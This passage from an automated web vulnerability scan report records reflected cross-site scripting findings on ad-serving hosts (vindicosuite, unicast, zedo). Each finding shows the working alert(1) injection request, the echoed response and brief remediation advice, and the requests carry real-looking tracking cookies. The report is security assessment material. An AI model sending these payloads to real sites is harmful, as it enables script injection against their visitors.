Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:33 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.143. http://cache.vindicosuite.com/xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp [coad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp

Issue detail

The value of the coad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb27a'%3balert(1)//3becd2a0162 was submitted in the coad parameter. This input was echoed as eb27a';alert(1)//3becd2a0162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is worse than a plain string literal: the response builds an array literal by string concatenation and hands it to eval(), so the injected value is parsed as code as soon as the script loads. The fix is to serialise the banner definition with a real JSON encoder instead of concatenating and eval()-ing it.

Request

GET /xumo/libs/vindicosuite/xumoJS/prod/vindicosuite.xumo.js.asp?coad=ca,300,250eb27a'%3balert(1)//3becd2a0162 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 14025
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:37:32 GMT
Connection: close

/*
* /xumo/libs/vindicosuite/xumoJS/tags/1.5.6/vindicosuite.xumo.min.js
* (c) 2010 BBE, Inc. All Rights Reserved.
* VERSION 1.5.6.4
*
*/
var VINDICOSUITE={};VINDICOSUITE.XUMO={version:"1.5.6.4",_banners:eval('[{id : "ca", width : "300" , height : "250eb27a';alert(1)//3becd2a0162"}]'),_debug:eval('false'),_min:eval('false'),_inplace:eval('true'),_inject:eval('true'),_trackingDomain:eval('false')?"64.15.238.78":"tracking.vindicosuite.com",jsfile:'/xumo/libs/vindicosuite/xumoJS/
...[SNIP]...

1.144. http://creativeby2.unicast.com/dynamic.js [pid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://creativeby2.unicast.com
Path:   /dynamic.js

Issue detail

The value of the pid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae03c(a)950fcf2715c was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the value is spliced into the identifier VwP…LoadSelect(), a context in which no output encoding can make arbitrary text safe; the fix is strict allowlist validation of pid (digits only, by the look of the legitimate value) before it reaches the template.

Request

GET /dynamic.js?geo=true&pid=61576ae03c(a)950fcf2715c&vnam=select&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:48 GMT
Connection: keep-alive


var connection_speed_select = "broadband";
var country_select = "us"; var region_select = "texas"; var city_select = "dallas"; var zip_code_select = "75207"; var metro_code_select = "623";
VwP61576ae03c(a)950fcf2715cLoadSelect();

1.145. http://creativeby2.unicast.com/dynamic.js [vnam parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://creativeby2.unicast.com
Path:   /dynamic.js

Issue detail

The value of the vnam request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69067(a)4f9dac9508e was submitted in the vnam parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As with pid, vnam is spliced into variable names (connection_speed_…, country_… and so on), so allowlist validation rather than encoding is the fix.

Request

GET /dynamic.js?geo=true&pid=61576&vnam=select69067(a)4f9dac9508e&0.32484483905136585 HTTP/1.1
Host: creativeby2.unicast.com
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUK200=L020711/Q64376_12126_950_020711_1_013111_401573x401527x020711x1x1/Q64251_12096_12_020611_1_032711_400946x400941x020611x1x1/Q65909_12441_950_020611_5_020711_408677x408668x020611x5x5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Length: 332
Content-Type: text/javascript
Server: Footprint Distributor V4.6
X-WR-GEO-CITY:
X-WR-GEO-DMA:
X-WR-GEO-LINESPEED:
X-WR-GEO-REGION:
X-WR-GEO-ZIP:
X-WR-MODIFICATION: Content-Length
Date: Mon, 14 Feb 2011 02:19:53 GMT
Connection: keep-alive


var connection_speed_select69067(a)4f9dac9508e = "broadband";
var country_select69067(a)4f9dac9508e = "us"; var region_select69067(a)4f9dac9508e = "texas"; var city_select69067(a)4f9dac9508e = "dallas"; var zip_code_select69067(a)4f9dac9508e = "7
...[SNIP]...

1.146. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2315b"%3balert(1)//bc620037b7e was submitted in the $ parameter. This input was echoed as 2315b";alert(1)//bc620037b7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two details are worth checking before relying on it: the payload is also written back in the FFpb cookie (see the Set-Cookie header), so it may outlive this response, and the injected // comment also swallows the } that closes the preceding if(typeof zzStr=='undefined'){ block on the same line, so whether the whole script still parses depends on the snipped remainder. Confirm execution in a browser rather than from the reflection alone.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=2315b"%3balert(1)//bc620037b7e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:2315b";alert(1)//bc620037b7e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',2315b";alert(1)//bc620037b7e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,2315b";alert(1)//bc620037b7e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.147. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cd2c'%3balert(1)//2d011e94584 was submitted in the $ parameter. This input was echoed as 5cd2c';alert(1)//2d011e94584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 1.146 the value is also persisted in the FFpb cookie. Here the reflection is in the standalone zzPat assignment, so the // only discards the rest of that line (the zzCustom assignment), and the shown portion of the script remains syntactically valid.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=5cd2c'%3balert(1)//2d011e94584&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:5cd2c';alert(1)//2d011e94584;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',5cd2c';alert(1)//2d011e94584';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5cd2c';alert(1)//2d011e94584;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.148. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab871'%3balert(1)//3d87bda826d was submitted in the $ parameter. This input was echoed as ab871';alert(1)//3d87bda826d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ab871'%3balert(1)//3d87bda826d&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ab871';alert(1)//3d87bda826d;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:06 GMT
Connection: close
Content-Length: 2069

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ab871';alert(1)//3d87bda826d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ab871';alert(1)//3d87bda826d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.149. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34260"%3balert(1)//38aea2a88ac was submitted in the $ parameter. This input was echoed as 34260";alert(1)//38aea2a88ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=34260"%3balert(1)//38aea2a88ac&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; 